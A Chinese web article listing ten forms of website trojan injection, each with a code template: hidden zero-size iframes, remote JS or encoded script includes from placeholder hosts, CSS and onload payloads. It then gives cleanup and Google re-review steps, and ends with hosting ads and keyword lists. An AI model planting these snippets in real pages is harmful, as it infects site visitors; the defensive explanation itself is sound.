木马网站木马存在形式和清除方法

木马网站  时间:2021-02-20  阅读:()

网站木马存在形式和清除方法h123网址大全http://www.h123.net.cn

木马的存在形态有如下几种

一:框架挂马iframe src=地址width=0 height=0/iframe

二:js文件挂马

首先将以下代码document.write("iframe width='0' height='0' src='地址'/i frame

保存为xxx. js

则JS挂马代码为script language=javascript src=xxx. js/script

三:js变形加密

SCRIPT language="JScript.Encode"src=http://www.xxx.com/muma.txt/scriptmuma. txt可改成任意后缀

四:body挂马body onload="window. location='地址' ;"/body

五:隐蔽挂马top.document.body. innerHTML =top.document.body. innerHTML + ' \r\niframesrc="' ">http://www.xxxxxxxxxxxxxx"/iframe注意此网址

为虚拟仅为说明木马情况。

六:css中挂马body {

background-image:url (' javascript:document.write("scriptsrc=http://www.XXX.net/muma. j s/script") ' ) }

七:JAJA挂马

SCRIPT language=javascriptwindow.open ("地址

", "", "toolbar=no, location=no,directories=no, status=no,menubar=no, scro llbars=no,width=1,height=1") ;

/script

八:图片伪装htmliframe src="网马地址" height=0 width=0/iframeimg src="图片地址"/center

/html

九:伪装调用frameset rows="444,0" cols="*"frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0"frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0"

/frameset

十:高级欺骗a href="(迷惑连接地址显示这个地址指向木马地址)"onMouseOver="www_szweb_cn() ; return true;"页面要显示的内容/a

SCRIPT Language="JavaScript"function www_szweb_cn()

{var url="网马地址";open(url, "NewWindow", "toolbar=no, location=no,directories=no,

status=no,menubar=no, scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600, left=10, top=10") ;}

/SCRIPT

清除木马的具体操作步骤如下

1)清除网页中的木马

删除现有的网页中的木马主要有这样类似的代码:iframe„或者„xxx. js/script

出现上面这些特征的代码如果里面包含的网址不是自己网站的那基本上就是中了木马了。我们比较常见的木马是iframe,对网站首页以及其它主要页面的源代码进行检查用记事本打开这些页面后 以“iframe”为关键字进行搜索找到后可以查看是否是挂马代码。不过碰上有经验的黑客会编写一段代码将整句挂马代码进行加密这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序如果有个别网页被修改我们可以很快地发现。

2)刺激google快速更新

木马被清除了 google上还是被屏蔽着。这时就想办法让google爬虫重新检索网站更新检索结果。这样 网站的屏蔽才能被解除。刺激google更新的的手段有如下一些

1)持续更新网站首页的文章

2)重新给google提交网站地图

3)为网站去找一些高质量的外链

4)申请审核。当网站有病毒后在google网站管理员工具内的“诊断”页面会有一个提示就是说网站含有恶意代码然后会提示你可以“申请审核”填写相关信息提交。h123网址大全http://www.h123.net.cn

ProfitServer$34.56/年,西班牙vps、荷兰vps、德国vps/不限制流量/支持自定义ISO

profitserver怎么样?profitserver是一家成立于2003的主机商家,是ITC控股的一个部门,主要经营的产品域名、SSL证书、虚拟主机、VPS和独立服务器,机房有俄罗斯、新加坡、荷兰、美国、保加利亚,VPS采用的是KVM虚拟架构,硬盘采用纯SSD,而且最大的优势是不限制流量,大公司运营,机器比较稳定,数据中心众多。此次ProfitServer正在对德国VPS(法兰克福)、西班牙v...

稳爱云(26元),香港云服务器 1核 1G 10M带宽

稳爱云(www.wenaiyun.com)是创建于2021年的国人IDC商家,主要目前要出售香港VPS、香港独立服务器、美国高防VPS、美国CERA VPS 等目前在售VPS线路有三网CN2、CN2 GIA,该公司旗下产品均采用KVM虚拟化架构。机房采用业内口碑最好香港沙田机房,稳定,好用,数据安全。线路采用三网(电信,联通,移动)回程电信cn2、cn2 gia优质网络,延迟低,速度快。自行封装的...

数脉科技香港自营,10Mbps CN2物理机420元/月

数脉科技怎么样?数脉科技品牌创办于2019,由一家从2012年开始从事idc行业的商家创办,目前主营产品是香港服务器,线路有阿里云线路和自营CN2线路,均为中国大陆直连带宽,适合建站及运行各种负载较高的项目,同时支持人民币、台币、美元等结算,提供支付宝、微信、PayPal付款方式。本次数脉科技给发来了新的7月促销活动,CN2+BGP线路的香港服务器,带宽10m起,配置E3-16G-30M-3IP,...

木马网站为你推荐
百度沸点颁奖典礼2009年度百度沸点颁奖典礼魏晨获什么奖主页改不了怎么改不了主页51自学网站有哪些免费自学网照片转手绘怎么把图片P成手绘唱吧电脑版官方下载唱吧有没有电脑版的啊?xp系统停止服务XP系统停止服务后怎么办?奇虎论坛奇虎是中国的吗?ejb开发什么是EJB?宕机宕机是什么意思ios系统ios是什么意思 ios系统是什么
免费二级域名 百度域名 美国和欧洲vps buyvm rackspace 免费博客空间 福建天翼加速 网通服务器托管 t云 移动服务器托管 阿里云手机官网 国外免费云空间 广州主机托管 贵州电信 第八届中美互联网论坛 htaccess 远程登录 日本小学生 ddos攻击器 隐士ddos 更多